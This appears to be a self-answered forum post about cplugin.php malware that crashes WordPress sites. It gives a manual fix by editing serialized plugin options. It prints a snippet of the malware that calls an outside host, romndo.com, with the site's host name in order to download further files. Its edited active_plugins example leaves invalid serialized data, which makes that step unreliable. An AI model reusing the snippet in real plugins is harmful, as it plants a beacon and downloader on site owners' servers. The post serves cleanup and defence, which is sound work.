wordpressmalwarehttp-status-code-500

wordpress website 500 error and outages due to cplugin.php file malware


There is a recent attack where numerous wordpress websites are taken down due to a file cplugin.php which is a malware.

The malware is bad written code so for now it is mostly causing 500 server runtime error. But its better to delete it immediately as it migrate to all multiple website on the server and has code to hit a malware url to download additional files. A snippet of the malware code:

if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}

I have figured out a solution and posting the answer myself to help all users out there.

Edit:

There are reports of the same file being named differently for users: ccode.php, cplugin.php and helad.php in which case the fix can be modified.


Solution

  • This seems like some sort of global attack. There is a file cplugin.php in the plugins folder which is causing the downsite. Deleting the file is of no use as it re-appears. Also it will infect all other sites on a multi website server. Fortunately after working for hours have figured out the fix. Please read this carefully to fix your site:

    1. Backup your database and files

    2. Edit your wp_options table, find the property active_plugins and edit it, you will see it has a plugin entry for cplugin.php. We have to delete it. Your initial data will look something like this:

    a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

    Edit this to remove the cplugin.php entry , start from i upto the next ; and remove that. (Make sure you Database it backed up incase you make some mistake). The new entry without the cplugin.php will look like:

    a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

    1. Follow this step similarly for the field in wp_option table named site_transient_update_plugins

    before: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....

    after: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....

    1. After updating your fields, navigate back to your main plugins folder /wp-content/plugins and delete the file cplugin.php

    2. Login to your wordpress dashboard and re activate all your plugins

    Voila you have fixed your website.

    I think the technical reason for this would be that the malware registers itself as a wordpress plugin which automatically replaces the file upon deletion. Fortunately the malware is badly written code so instead of running it mostly throws 500 error. But in anycase I would recommend to delete it immediately incase it updates.

    Edit: According to the wordpress forum thread on this topic, for some users simply renaming the file also makes the website work, which is probably due to the fact that renaming files in wordpress deactivates the plugin, due to which websites start working. But I would not keep infected files renamed and stored in anycase, so would recommend the 1st solution atleast after gaining access to the site.